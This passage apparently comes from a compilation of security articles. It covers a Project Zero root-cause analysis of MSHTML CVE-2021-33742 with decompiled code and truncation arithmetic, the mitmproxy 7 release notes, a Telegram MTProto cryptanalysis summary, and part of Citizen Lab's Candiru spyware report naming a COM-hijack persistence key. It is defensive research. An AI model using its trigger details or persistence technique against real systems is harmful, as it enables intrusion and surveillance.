    v189 = (CTreeNode *)(v73 + v74 - 1);
  }
  if ( v184 <= (int)v187 )
  {
    v77 = (struct CMarkup *)operator new[](   /*** [1] allocates based on truncated size ***/
            (unsigned int)newAlloc,
            (const struct MemoryProtection::leaf_t *)newAllocSz);
    v4[23] = v77;
    if ( v77 )
    {
      for ( i = v4[5]; i != *((struct CMarkup **)v4[6] + 5); i = (struct CMarkup *)*((_DWORD *)i + 5) )
      {
        if ( (*(_BYTE *)i & 4) != 0 )
        {
          /*** [2] srcTextSz is non truncated size ***/
          srcText = Tree::TextData::GetText(*((Tree::TextData **)i + 8), 0, &srcTextSz);
          /*** [3] -- srcTextSz > newAllocSz ***/
          wmemcpy_s(srcText, srcTextSz, (const wchar_t *)newAlloc, (rsize_t)newAllocSz);
          /*** memcpy only copied newAllocSz not srcTextSz so v190 is now > max ***/
          v190 += srcTextSz;
        }
        else if ( (*(_BYTE *)i & 3) != 0 && (*(_BYTE *)i & 0x40) != 0 )
        {
          v80 = v190;
          *((_WORD *)v4[23] + (_DWORD)v190) = 0xFDEF;
          v190 = v80 + 1;
        }
      }
    }

Patch analysis: The patch is in Tree::TreeWriter::NewTextPosInternal. The patch causes a release assert if there is an attempt to add TextData greater than 0x1FFFFFFF to the HTML tree.
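To see why the PoC above uses Array(40370176), here's a quick back-of-the-envelope check of the 25-bit truncation — assuming the length counted is the character count, with the mask following the 25-bit size field described above:

MASK = 0x1FFFFFF                 # low 25 bits kept; top 7 bits of the field are flags
full = 40370176 - 1              # Array(n).toString() yields n-1 commas, i.e. 40370175 chars
trunc = full & MASK

print(hex(full))                 # 0x267ffff - length kept in the text data object
print(hex(trunc))                # 0x67ffff  - truncated length kept in CTreePos
print(full - trunc)              # 33554432 characters of out-of-bounds distance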
A fuzzer may not have found this vulnerability if it runs with a tight timeout, since this vulnerability takes a few seconds to trigger. It still seems more likely that this would have been found via fuzzing rather than manual review.
(Historical/present/future) context of bug: See this Google TAG blogpost for more info. Malicious Office documents loaded web content within Internet Explorer. The malicious document would fingerprint the device and then serve the Internet Explorer exploit website to users.

The Exploit
(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)
Exploit strategy (or strategies): Still under analysis.
Exploit flow:
Known cases of the same exploit flow:
Part of an exploit chain? This vulnerability was likely paired with a sandbox escape, but that was not collected.

The Next Steps
Variant analysis
Areas/approach for variant analysis (and why): It seems possible that there would be more instances of this type throughout the code base if CTreePos structures truncate sizes to 25 bits while other areas, such as TextData, do not. The top 7 bits of the size in the CTreePos struct are used as flags.
Found variants: N/A
Structural improvements
What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?
Ideas to kill the bug class: If truncating the size/length of an object, do the bounds checking/input validation of the size at the earliest point, and only store the truncated size. Kill the tab process when the size reaches a value that can no longer be properly represented.
Ideas to mitigate the exploit flow: N/A
Other potential improvements: Microsoft has announced that Internet Explorer will be retired in June 2022. However, it also says that the retirement does not affect the MSHTML (Trident) engine. This means that mshtml.dll, where this vulnerability exists, is not planned to be retired. In the future, if a user enables IE mode in Edge, the MSHTML engine will be used. It seems likely that Office will still have access to MSHTML. Limit access to MSHTML and audit applications that use it.
0-day detection methods
What are potential detection methods for similar 0-days? Meaning, are there any ideas of how this exploit or similar exploits could be detected as a 0-day? Variants of this bug could potentially be detected by looking for JavaScript that tries to create objects with sizes greater than the allowed bounds.
Other References
July 2021: "How We Protect Users From 0-Day Attacks" by Google's Threat Analysis Group gives context about how this exploit was used.
Sursa: https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html
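As referenced in the vulnerability details, the PoC's magic number can be checked against the 25-bit truncation with a few lines of Python (a sketch; the interpretation of which length lands where follows the analysis quoted above):

# Array(40370176).toString() produces 40370176 empty slots joined by
# commas, i.e. a string of 40370175 characters.
full_len = 40370176 - 1
truncated = full_len & 0x1FFFFFF  # 25-bit size stored in CTreePos

print(hex(full_len))              # 0x267ffff: length kept in TextData
print(hex(truncated))             # 0x67ffff: length used for the allocation
print(hex(full_len - truncated))  # 0x2000000: how far the copy index (v190)
                                  # runs past the allocation

The PoC value is chosen so that the string length exceeds 25 bits, making the truncated allocation 0x2000000 elements smaller than the length used to advance the write index.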
22. Mitmproxy 7
16 Jul 2021, Maximilian Hils @maximilianhils

We're delighted to announce the release of mitmproxy 7, a free and open source interactive HTTPS proxy. This release is all about our new proxy core, which brings substantial improvements across the board and represents a massive milestone for the project.

What's in the release?
In this post we'll focus on some of the user-facing improvements coming with mitmproxy 7. If you are interested in the technical details of our new sans-io proxy core, check out our blog post dedicated to that!

Full TCP Support
Mitmproxy now supports proxying raw TCP connections out of the box, including ones that start with a server-side greeting – for example SMTP. Opportunistic TLS (STARTTLS) is not supported yet, but regular TCP-over-TLS just works!

HTTP/1 ⇔ HTTP/2 Interoperability
Mitmproxy can now accept HTTP/2 requests from the client and forward them to an HTTP/1 server. This on-the-wire protocol translation works bi-directionally: all HTTP requests and responses were created equal! This change also makes it possible to change the request destination for HTTP/2 flows, which previously was not possible at all.

WebSocket Message Display
Mitmproxy now displays WebSocket messages not only in the event log, but also in a dedicated UI tab! There are still UX details to be ironed out, but we're excited to ship a first prototype here. While this is only for the console UI via mitmproxy, the web UI via mitmweb is still looking for amazing contributors to get feature parity!

Secure Web Proxy (TLS-over-TLS)
Clients usually talk in plaintext to HTTP proxies – telling them where to connect – before they ultimately establish a secure TLS connection through the proxy with the destination server. With mitmproxy 7, clients can now establish TLS with the proxy right from the start (before issuing an HTTP CONNECT request), which can add a significant layer of defense in public networks. So instead of simply specifying http://127.0.0.1:8080 you can now also use HTTPS via https://127.0.0.1:8080 (or any other listen host and port).

Windows Support for Console UI
Thanks to an experimental urwid patch, mitmproxy's console UI is now natively available on Windows. While the Windows Subsystem for Linux (WSL) has been a viable alternative for a while, we're very happy to provide the same tools across all platforms now.

API Reference Documentation
Having recently adopted the pdoc project, which generates awesome Python API documentation, we have built a completely new API reference documentation for mitmproxy's addon API. Paired with our existing examples on GitHub, this makes it much simpler to write new mitmproxy addons (see the short addon sketch after this post).

What's next?
While this release focuses heavily on our backend, the next mitmproxy release will come with lots of mitmweb improvements by our current GSoC 2021 student @gorogoroumaru. Stay tuned!

Release Changelog
Since the release of mitmproxy 6 about seven months ago, the project has had 527 commits by 28 contributors, resulting in 234 closed issues and 173 closed pull requests.

New Proxy Core (@mhils)
- Secure Web Proxy: Mitmproxy now supports TLS-over-TLS to already encrypt the connection to the proxy.
- Server-Side Greetings: Mitmproxy now supports proxying raw TCP connections, including ones that start with a server-side greeting (e.g. SMTP).
- HTTP/1 – HTTP/2 Interoperability: mitmproxy can now accept an HTTP/2 connection from the client, and forward it to an HTTP/1 server.
- HTTP/2 Redirects: The request destination can now be changed on HTTP/2 flows.
- Connection Strategy: Users can now specify if they want mitmproxy to eagerly connect upstream or wait as long as possible. Eager connections are required to detect protocols with server-side greetings; lazy connections enable the replay of responses without connecting to an upstream server.
- Timeout Handling: Mitmproxy will now clean up idle connections and also abort requests if the client disconnects in the meantime.
- Host Header-based Proxying: If the request destination is unknown, mitmproxy now falls back to proxying based on the Host header. This means that requests can often be redirected to mitmproxy using DNS spoofing only.
- Internals: All protocol logic is now separated from I/O ("sans-io"). This greatly improves testing capabilities, prevents a wide array of race conditions, and increases proper isolation between layers.

Additional Changes
- mitmproxy's command line interface now supports Windows (@mhils)
- The clientconnect, clientdisconnect, serverconnect, serverdisconnect, and log events have been replaced with new events; see the addon documentation for details (@mhils)
- Contentviews now implement render_priority instead of should_render, allowing more specialization (@mhils)
- Addition of a block_list option to block requests with a set status code (@ericbeland)
- Make mitmweb columns configurable and customizable (@gorogoroumaru)
- Automatic JSON view mode when the content type has a +json suffix (@kam800)
- Use pyca/cryptography to generate certificates, not pyOpenSSL (@mhils)
- Remove the legacy protocol stack (@Kriechi)
- Remove all deprecated pathod and pathoc tools and modules (@Kriechi)
- In reverse proxy mode, mitmproxy now does not assume TLS if no scheme is given but a custom port is provided (@mhils)
- Remove the following options: http2_priority, relax_http_form_validation, upstream_bind_address, spoof_source_address, and stream_websockets. If you depended on one of them, please let us know. mitmproxy never phones home, which means we don't know how prominently these options were used. (@mhils)
- Fix IDNA host "Bad HTTP request line" error (@grahamrobbins)
- Pressing ? now exits the console help view (@abitrolly)
- --modify-headers now works correctly when modifying a header that is also part of the filter expression (@Prinzhorn)
- Fix SNI-related reproducibility issues when exporting to curl/httpie commands. (@dkasak)
- Add option export_preserve_original_ip to force the exported command to connect to the IP from the original request. Only supports curl at the moment. (@dkasak)
- Major proxy protocol testing (@r00t-)
- Switch Docker image release to be based on Debian (@PeterDaveHello)
- Multiple Browsers: The browser.start command may be executed more than once to start additional browser sessions. (@rbdixon)
- Improve readability of SHA256 fingerprint. (@wrekone)
- Metadata and Replay Flow Filters: Flows may be filtered based on metadata and replay status. (@rbdixon)
- Flow control: don't read connection data faster than it can be forwarded. (@hazcod)
- Docker images for ARM64 architecture (@hazcod, @mhils)
- Fix parsing of certificate issuer/subject with escaped special characters (@Prinzhorn)
- Customize markers with emoji, and filters: The flow.mark command may be used to mark a flow with either the default "red ball" marker, a single character, or an emoji like 🍇. Use the ~marker filter to filter on marker characters. (@rbdixon)
- New flow.comment command to add a comment to the flow. Add ~comment <regex> filter syntax to search flow comments. (@rbdixon)
- Fix multipart forms losing boundary values on edit. (@roytu)
- Transfer-Encoding: chunked HTTP message bodies are now retained if they are below the stream_large_bodies limit. (@mhils)
- The json() method for HTTP Request and Response instances will return the decoded JSON body. (@rbdixon)
- Support for HTTP/2 Push Promises has been dropped. (@mhils)
- Make it possible to set sequence options from the command line. (@Yopi)

Sursa: https://mitmproxy.org/posts/releases/mitmproxy7/
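As referenced above, a minimal addon sketch (assuming mitmproxy 7 is installed; the request hook and module-level addons list follow mitmproxy's documented addon conventions, while the header name and value are arbitrary examples):

from mitmproxy import http

class TagRequests:
    """Add a marker header to every proxied request."""
    def request(self, flow: http.HTTPFlow) -> None:
        # flow.request is the parsed HTTP request; headers behave like a dict.
        flow.request.headers["x-proxied-by"] = "mitmproxy-7"

addons = [TagRequests()]

Run it with: mitmproxy -s tag_requests.py (mitmdump and mitmweb accept the same -s flag).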
23. Security Analysis of Telegram (Symmetric Part)

Overview
We performed a detailed security analysis of the encryption offered by the popular Telegram messaging platform. As a result of our analysis, we found several cryptographic weaknesses in the protocol, ranging from technically trivial and easy to exploit to more advanced and of theoretical interest. For most users, the immediate risk is low, but these vulnerabilities highlight that Telegram fell short of the cryptographic guarantees enjoyed by other widely deployed cryptographic protocols such as TLS. We made several suggestions to the Telegram developers that enable formal assurances ruling out a large class of cryptographic attacks, similarly to other, more established, cryptographic protocols.
By default, Telegram uses its bespoke MTProto protocol to secure communication between clients and its servers as a replacement for the industry-standard Transport Layer Security (TLS) protocol. While Telegram is often referred to as an "encrypted messenger", this level of protection is the only protection offered by default: MTProto-based end-to-end encryption, which would protect communication from Telegram employees or anyone breaking into Telegram's servers, is only optional and not available for group chats. We thus focused our efforts on analysing whether Telegram's MTProto offers privacy comparable to surfing the web with HTTPS.

Vulnerabilities
We disclosed the following vulnerabilities to the Telegram development team on 16 April 2021 and agreed with them on a disclosure on 16 July 2021:
- An attacker on the network can reorder messages coming from a client to the server. This allows, for example, altering the order of "pizza" and "crime" in the sequence of messages: "I say yes to", "all the pizzas", "I say no to", "all the crimes". This attack is trivial to carry out. Telegram confirmed the behaviour we observed and addressed this issue in version 7.8.1 for Android, 7.8.3 for iOS and 2.8.8 for Telegram Desktop.
- An attacker can detect which of two special messages was encrypted by a client or a server under some special conditions. In particular, Telegram encrypts acknowledgement messages, i.e. messages that encode that a previous message was indeed received, but the way it handles the re-sending of unacknowledged messages leaks whether such an acknowledgement was sent and received. This attack is mostly of theoretical interest. However, cryptographic protocols are expected to rule out even such attacks. Telegram confirmed the behaviour we observed and addressed this issue in version 7.8.1 for Android, 7.8.3 for iOS and 2.8.8 for Telegram Desktop.
- We also studied the implementation of Telegram clients and found that three of them (Android, iOS, Desktop) contained code which, in principle, permitted the recovery of some plaintext from encrypted messages. For this, an attacker must send many carefully crafted messages to a target, on the order of millions of messages. This attack, if executed successfully, could be devastating for the confidentiality of Telegram messages. Luckily, it is almost impossible to carry out in practice. In particular, it is mostly mitigated by the coincidence that certain metadata in Telegram is chosen randomly and kept secret.
The presence of these implementation weaknesses, however, highlights the brittleness of the MTProto protocol: it mandates that certain steps are done in a problematic order (see the discussion below), which puts a significant burden on developers (including developers of third-party clients) who have to avoid accidental leakage. The three official Telegram clients which exhibit non-ideal behaviour are evidence that this is a high burden. Telegram confirmed the attacks and rolled out fixes to all three affected clients in June. Telegram also awarded a "bug bounty" for these vulnerabilities.
We also show how an attacker can mount an "attacker-in-the-middle" attack on the initial key negotiation between the client and the server. This allows an attacker to impersonate the server to the client, breaking the confidentiality and integrity of the communication. Luckily, this attack is also quite difficult to carry out, as it requires sending billions of messages to a Telegram server within minutes. However, it highlights that while users are required to trust Telegram's servers, the security of those servers and their implementations cannot be taken for granted. Telegram confirmed the behaviour and implemented some server-side mitigations. In addition, from version 7.8.1 for Android, 7.8.3 for iOS and 2.8.8 for Telegram Desktop, the client apps support an RSA-OAEP+ variant.
We were informed by the Telegram developers that they do not do security or bugfix releases except for immediate post-release crash fixes. The development team also informed us that they did not wish to issue security advisories at the time of patching, nor commit to release dates for specific fixes. As a consequence, the fixes were rolled out as part of regular Telegram updates.

Formal Security Analysis
The central result of our investigation, however, is that Telegram's MTProto can provide a confidential and integrity-protected channel when the changes we suggested are adopted by the Telegram developers. As mentioned above, the Telegram developers communicated to us that they did adopt these changes. Telegram awarded a cash prize for this analysis to stimulate future analysis.
However, this result comes with significant caveats. Cryptographic protocols like MTProto are built from cryptographic building blocks such as hash functions, block ciphers and public-key encryption. In a formal security analysis, the security of the protocol is reduced to the security of its building blocks. This is no different from arguing that a car is road-safe if its tires, brakes and indicator lights are fully functional. In the case of Telegram, the security requirements on the building blocks are unusual. Because of this, these requirements have not been studied in previous research. This is somewhat analogous to making assumptions about a car's brakes that have not been lab-tested. Other cryptographic protocols such as TLS do not have to rely on these sorts of special assumptions.
A further caveat of these findings is that we only studied three official Telegram clients and no third-party clients. However, some of these third-party clients have substantial user bases. Here, the brittleness of the MTProto protocol is a cause for concern if the developers of these third-party clients are likely to make mistakes in implementing the protocol in a way that avoids, e.g., the timing leaks mentioned above. Alternative design choices for MTProto would have made the task significantly easier for the developers.

Paper
Martin R. Albrecht, Lenka Mareková, Kenneth G. Paterson, Igors Stepanovs: Four Attacks and a Proof for Telegram. To appear at the IEEE Symposium on Security and Privacy 2022.

Team
- Martin R. Albrecht (Information Security Group, Royal Holloway, University of London)
- Lenka Mareková (Information Security Group, Royal Holloway, University of London)
- Kenneth G. Paterson (Applied Cryptography Group, ETH Zurich)
- Igors Stepanovs (Applied Cryptography Group, ETH Zurich)

A Somewhat Opinionated Discussion
"Don't roll your own crypto" is a common mantra issued when a cryptographic vulnerability is found in some protocol. Indeed, Telegram has been the recipient of unsolicited advice of this nature. The problem with this mantra is, of course, that it sounds like little more than gatekeeping. Clearly, some people need to roll "their own crypto" for cryptography to be rolled at all. However, despite the gatekeeping flavour, there is a rationale behind this advice. Standard cryptographic protocols have received attention from analysts, and new protocols are developed in parallel with a proof that roughly says: "No adversary with these capabilities can break the given well-defined security goals unless one of the underlying primitives – a block cipher, a hash function etc. – has a weakness." Of course, proofs can have bugs too, but this process significantly reduces the risk of catastrophic failure.
Two of our attacks described above serve to illustrate that some behaviours exhibited by Telegram clients and servers are undesirable (permitting reordering of some messages, encrypting twice under the same state in some corner case). The apparent need to make non-standard assumptions on the underlying building blocks in our proofs (which we do not know how to avoid) further illustrates that some design choices made in MTProto are more risky than they need to be. In other words, this part of our paper – "Two Attacks and a Proof", so to speak – illustrates the implied rationale of the above-mentioned mantra: proofs help to reduce the attack surface.
But there is another leg of the "don't roll your own crypto" mantra: it can be surprisingly tricky to implement cryptographic algorithms in a way that they leak no secret information, e.g. through timing side channels. Proofs only cover what is in their model. Two of our attacks are timing attacks and thus "outside the model". Our proof essentially states that it is, in principle, possible to implement MTProto in a way that is secure, but it does not cover how easy or hard that is, or how to do it at all. Here, two recurring "anti-patterns" in MTProto's design make it tricky to implement the protocol securely.
First, MTProto opts to protect the integrity of plaintexts rather than ciphertexts. This is the difference between Encrypt-and-MAC and Encrypt-then-MAC (a small sketch contrasting the two receiver-side orders of operations appears at the end of this post). It might seem natural to protect the integrity of the part that you care about – the plaintext – but doing it this way around means that a receiver must first process an incoming ciphertext with their secret key (i.e. decrypt it) before being able to verify that the ciphertext has not been tampered with. In other words, the receiver must perform a computation involving untrusted data – the received ciphertext – and their decryption key. This can be done in a secure manner, but Encrypt-then-MAC completely sidesteps the issue by first checking whether the ciphertext was tampered with (i.e. checking the MAC on the ciphertext), and only then decrypting.
Second, and related to the first point, block ciphers process data in blocks of, e.g., 16 bytes.
Since data may have an arbitrary byte length, there will be some bytes left over, which MTProto fills with random garbage (which is good). Now, since Telegram protects the integrity of plaintexts instead of ciphertexts, the question arises: compute the MAC over the plaintext with or without the padding? The original design decision was "without padding", presumably because the designers did not see a need to protect useless random padding. The remaining two of our attacks exploit this behaviour.
As mentioned above, we break – in a completely impractical way! – the initial key exchange between the client and the server. Here, we exploit that MTProto attempts to add integrity inside RSA encryption by including a hash of the payload but excluding the added random padding. This is like a homegrown variant of RSA-OAEP. The problem with this approach is that the receiver must – after decryption – figure out where the payload ends and where the padding starts. This means parsing the payload before being able to check its integrity. Furthermore, depending on the result of this parsing, more or less data may be fed into the hash function for integrity checking, which in turn produces slightly shorter or longer running times (our actual attack proceeds differently; we are merely illustrating the principle here while avoiding many details).
Our second attack goes for the one place where MTProto does indeed also protect useless random padding, but the processing in some clients behaves as if this was not the case. In 2015, Jakob Jakobsen and Claudio Orlandi gave an attack on the IND-CCA security of the previous version of MTProto. As a result of this, MTProto 2.0, the current version, now also protects the integrity of the padding bytes. Thus, the logic now could be: (a) decrypt and then immediately (b) check integrity. (This, too, isn't without its pitfalls. For example, when do you know that you have enough data to run the integrity check? Parsing some length field first, for example, to establish this could again lead to attacks.) However, we found that three official Telegram clients do additional processing on the decrypted data before step (b), processing that is necessary in MTProto 1.0 (where padding and plaintext data needed to be separated before checking integrity) but not in MTProto 2.0 (where the integrity of everything is protected). We exploit – again in a completely impractical way! – this behaviour in our attacks (but we also need to combine it with the previous attack to make it all come together). So, again, the original decision not to protect some useless random bytes in MTProto 1.0 required the receiver to decide which bytes are useless and which aren't before checking their integrity, and three official Telegram clients have carried this behaviour forward into MTProto 2.0.
As an aside, Jakobsen and Orlandi wrote: "We stress that this is a theoretical attack on the definition of security and we do not see any way of turning the attack into a full plaintext-recovery attack." Similarly, the Telegram "FAQ for the Technically Inclined (MTProto v.1.0)" provides the following analogy: "A postal worker could write 'Haha' (using invisible ink!) on the outside of a sealed package that he delivers to you. It didn't stop the package from being delivered, it doesn't allow them to change the contents of the package, and it doesn't allow them to see what was inside." In hindsight, we think that this is incorrect.
As explained above, our timing side channels essentially exploit this behaviour in order to do message recovery (but we need to "chain" two "exploits" to make it work, even ignoring practicality concerns).
In summary, MTProto protects the integrity of plaintexts rather than ciphertexts, which necessitates operating with a decryption key on untrusted data. Moreover, by protecting only the payload without the padding, MTProto in several places required (or at least used to require) additional parsing of decrypted data before its integrity could be checked. This produces an opportunity for timing side-channel attacks; an opportunity that could be completely removed by using a standard authenticated encryption scheme (roughly speaking, Encrypt-then-MAC with key separation has been shown to be a decent such scheme, but faster dedicated schemes exist). Finally, given that Telegram's ecosystem is also serviced by many third-party clients, the "brittleness" of the design and the presence of "footguns" mean that even if the developers of the official clients manage to take great care to avoid timing leaks, those are difficult to rule out for third-party clients.

Q & A
What about IGE? Telegram uses the little-known Infinite Garble Extension (IGE) block cipher mode in place of more standard alternatives. While claims about its infinite error propagation have been disproven, our proofs show that its use in the symmetric part of MTProto is no more problematic than if CBC mode was used. However, its similarity to CBC also means it is vulnerable to manipulation if some bits of plaintext are known. Indeed, we use this property in combination with the timing side channel described earlier.
What about length extension attacks? MTProto makes heavy use of plain SHA-256, both in deriving keys and in calculating the MAC, which at first look appears to be the kind of use that would lead to length extension attacks. However, as our proofs show, MTProto manages to sidestep this particular issue because of its plaintext encoding format, which mandates the presence of certain metadata in the first block.
Did we really break IND-CPA? Above, we wrote:
"An attacker can detect which of two special messages was encrypted by a client or a server under some special conditions. In particular, Telegram encrypts acknowledgement messages, i.e. messages that encode that a previous message was indeed received, but the way it handles the re-sending of unacknowledged messages leaks whether such an acknowledgement was sent and received. This attack is mostly of theoretical interest. However, cryptographic protocols are expected to rule out even such attacks. Telegram confirmed the behaviour we observed and addressed this issue in version 7.8.1 for Android, 7.8.3 for iOS and 2.8.8 for Telegram Desktop."
Telegram wrote:
"MTProto never produces the same ciphertext, even for messages with identical content, because MTProto is stateful and msg_id is changed on every encryption. If one message is re-sent on the order of 2^64 times, MTProto can transmit the same ciphertext for the same message on two of these re-sendings. However, it would not be correct to claim that retransmission over the network of the same ciphertext for a message that was previously sent is a violation of IND-CPA security, because otherwise any protocol over TCP wouldn't be IND-CPA secure due to TCP retransmissions. To facilitate future research, each message that is re-sent by Telegram apps is now either wrapped in a new container or re-sent with a new msg_id."
We have already addressed this in the latest version of our write-up (which we shared with the Telegram developers on 15 July 2021). We reproduce that part below, slightly edited for readability.
If a message is not acknowledged within a certain time in MTProto, it is re-encrypted using the same msg_id and with fresh random padding. While this appears to be a useful feature and a mitigation against message deletion, it enables attacks in the IND-CPA setting, as we explain next. As a motivation, consider a local passive adversary that tries to establish whether R responded to I when looking at a transcript of three ciphertexts (c_{I,0}, c_{R}, c_{I,1}), where c_{u} represents a ciphertext sent from u. In particular, it aims to establish whether c_{R} encrypts an automatically generated acknowledgement (we will use "ACK" below to denote this) or a new message from R. If c_{I,1} is a re-encryption of the same message as c_{I,0}, re-using the state, this leaks that bit of information about c_{R}. Note that here we are breaking the confidentiality of the ciphertext carrying "ACK". In addition to these encrypted acknowledgement messages, the underlying transport layer, e.g. TCP, may also issue unencrypted ACK messages or may resend ciphertexts as is. The difference between these two cases is that in the former case the acknowledgement message is encrypted, while in the latter it is not. For completeness, note that Telegram clients do not resend cached ciphertext blobs when unacknowledged, but re-encrypt the underlying message under the same state with fresh random padding.
These paragraphs are then followed by a semi-formal write-up of the attack.
Sursa: https://mtpsym.github.io/
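As referenced above, a minimal Python sketch contrasting the two receiver-side orders of operations (this is not MTProto; the toy XOR "cipher" is a stand-in so the example runs with only the standard library, and the point is solely when the decryption key first touches untrusted data):

import hashlib
import hmac

def mac(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()

def toy_decrypt(key: bytes, data: bytes) -> bytes:
    # Stand-in "decryption" (XOR with a key-derived stream); NOT real crypto.
    stream = hashlib.sha256(key).digest() * (len(data) // 32 + 1)
    return bytes(a ^ b for a, b in zip(data, stream))

def receive_encrypt_then_mac(mac_key, dec_key, ciphertext, tag):
    # MAC over the ciphertext: unauthenticated input is rejected before
    # the decryption key is ever used on it.
    if not hmac.compare_digest(mac(mac_key, ciphertext), tag):
        raise ValueError("rejected before any decryption")
    return toy_decrypt(dec_key, ciphertext)

def receive_encrypt_and_mac(mac_key, dec_key, ciphertext, tag):
    # MAC over the plaintext (the MTProto-style order): the receiver must
    # first decrypt, i.e. perform a secret-key computation on
    # attacker-controlled data, before it can check anything.
    plaintext = toy_decrypt(dec_key, ciphertext)
    if not hmac.compare_digest(mac(mac_key, plaintext), tag):
        raise ValueError("rejected only after decryption")
    return plaintext

In the second variant, everything that happens between decryption and the integrity check (separating padding from payload, parsing length fields) is exactly the kind of processing the article identifies as an opportunity for timing side channels.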
24. Hooking Candiru: Another Mercenary Spyware Vendor Comes into Focus
By Bill Marczak, John Scott-Railton, Kristin Berdan, Bahr Abdul Razzak, and Ron Deibert
July 15, 2021

Summary
- Candiru is a secretive Israel-based company that sells spyware exclusively to governments. Reportedly, their spyware can infect and monitor iPhones, Androids, Macs, PCs, and cloud accounts.
- Using Internet scanning we identified more than 750 websites linked to Candiru's spyware infrastructure. We found many domains masquerading as advocacy organizations such as Amnesty International and the Black Lives Matter movement, as well as media companies and other civil-society themed entities.
- We identified a politically active victim in Western Europe and recovered a copy of Candiru's Windows spyware.
- Working with the Microsoft Threat Intelligence Center (MSTIC) we analyzed the spyware, resulting in the discovery of CVE-2021-31979 and CVE-2021-33771 by Microsoft, two privilege escalation vulnerabilities exploited by Candiru. Microsoft patched both vulnerabilities on July 13th, 2021.
- As part of their investigation, Microsoft observed at least 100 victims in Palestine, Israel, Iran, Lebanon, Yemen, Spain, the United Kingdom, Turkey, Armenia, and Singapore. Victims include human rights defenders, dissidents, journalists, activists, and politicians.
- We provide a brief technical overview of the Candiru spyware's persistence mechanism and some details about the spyware's functionality.
- Candiru has made efforts to obscure its ownership structure, staffing, and investment partners. Nevertheless, we have been able to shed some light on those areas in this report.

1. Who is Candiru?
The company known as "Candiru," based in Tel Aviv, Israel, is a mercenary spyware firm that markets "untraceable" spyware to government customers. Their product offering includes solutions for spying on computers, mobile devices, and cloud accounts.
Figure 1: A distinctive mural of five men with empty heads wearing suits and bowler hats is displayed in this "Happy Hour" photo of a previous Candiru office, posted on Facebook by a catering company.

A Deliberately Opaque Corporate Structure
Candiru makes efforts to keep its operations, infrastructure, and staff identities opaque to public scrutiny. Candiru Ltd. was founded in 2014 and has undergone several name changes (see Table 1). Like many mercenary spyware corporations, the company reportedly recruits from the ranks of Unit 8200, the signals intelligence unit of the Israeli Defence Forces. While the company's current name is Saito Tech Ltd., we will refer to them as "Candiru" as they are most well known by that name. The firm's corporate logo appears to be a silhouette of the reputedly-gruesome candiru fish in the shape of the letter "C."

Company name | Date of registration | Possible meaning
Saito Tech Ltd. (סאייטו טק בעיימ) | 2020 | "Saito" is a town in Japan
Taveta Ltd. (טאבטה בעיימ) | 2019 | "Taveta" is a town in Kenya
Grindavik Solutions Ltd. (גרינדוויק פתרונות בעיימ) | 2018 | "Grindavik" is a town in Iceland
DF Associates Ltd. (ד. אפ אסוסיאייטס בעיימ) | 2017 | ?
Candiru Ltd. (קנדירו בעיימ) | 2014 | A parasitic freshwater fish
Table 1: Candiru's corporate registrations over time

Candiru has at least one subsidiary: Sokoto Ltd. Section 5 provides further documentation of Candiru's corporate structure and ownership.

Reported Sales and Investments
According to a lawsuit brought by a former employee, Candiru had sales of "nearly $30 million" within two years of its founding.
The firm's reported clients are located in "Europe, the former Soviet Union, the Persian Gulf, Asia and Latin America." Additionally, reports of possible deals with several countries have been published:
- Uzbekistan: In a 2019 presentation at the Virus Bulletin security conference, a Kaspersky Lab researcher stated that Candiru likely sold its spyware to Uzbekistan's National Security Service.
- Saudi Arabia & the UAE: The same presentation also mentioned Saudi Arabia and the UAE as likely Candiru customers.
- Singapore: A 2019 Intelligence Online report mentions that Candiru was active in soliciting business from Singapore's intelligence services.
- Qatar: A 2020 Intelligence Online report notes that Candiru "has become closer to Qatar." A company linked to Qatar's sovereign wealth fund has invested in Candiru. No information on Qatar-based customers has yet emerged.

Candiru's Spyware Offerings
A leaked Candiru project proposal published by TheMarker shows that Candiru's spyware can be installed using a number of different vectors, including malicious links, man-in-the-middle attacks, and physical attacks. A vector named "Sherlock" is also offered, which they claim works on Windows, iOS, and Android. This may be a browser-based zero-click vector.
Figure 2: Infection vectors offered by Candiru.
Like many of its peers, Candiru appears to license its spyware by the number of concurrent infections, which reflects the number of targets that can be under active surveillance at any one instant in time. Like NSO Group, Candiru also appears to restrict the customer to a set of approved countries. The €16 million project proposal allows for an unlimited number of spyware infection attempts, but the monitoring of only 10 devices simultaneously. For an additional €1.5M, the customer can purchase the ability to monitor 15 additional devices simultaneously, and to infect devices in a single additional country. For an additional €5.5M, the customer can monitor 25 additional devices simultaneously, and conduct espionage in five more countries.
Figure 3: Proposal for a Candiru customer indicating the number of concurrent infections under a given contract.
The fine print in the proposal states that the product will operate in "all agreed upon territories," then mentions a list of restricted countries including the US, Russia, China, Israel and Iran. This same list of restricted countries has previously been mentioned by NSO Group. Nevertheless, Microsoft observed Candiru victims in Iran, suggesting that in some situations, products from Candiru do operate in restricted territories. In addition, targeting infrastructure disclosed in this report includes domains masquerading as the Russian postal service.
The proposal states that the spyware can exfiltrate private data from a number of apps and accounts including Gmail, Skype, Telegram, and Facebook. The spyware can also capture browsing history and passwords, turn on the target's webcam and microphone, and take pictures of the screen. Capturing data from additional apps, such as Signal Private Messenger, is sold as an add-on.
Figure 4: Customers can pay additional money to capture data from Signal.
For a further additional €1.5M fee, customers can purchase a remote shell capability, which allows them full access to run any command or program on the target's computer. This kind of capability is especially concerning, given that it could also be used to place files, such as incriminating materials, onto an infected device.
2. Finding Candiru's Malware In The Wild
Using telemetry data from Team Cymru, along with assistance from civil society partners, the Citizen Lab was able to identify a computer that we suspected contained a persistent Candiru infection. We contacted the owner of the computer, a politically active individual in Western Europe, and arranged for the computer's hard drive to be imaged. We ultimately extracted a copy of Candiru's spyware from the disk image. While analysis of the extracted spyware is ongoing, this section outlines our initial findings about the spyware's persistence.

Persistence
Candiru's spyware was persistently installed on the computer via COM hijacking of the following registry key:
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
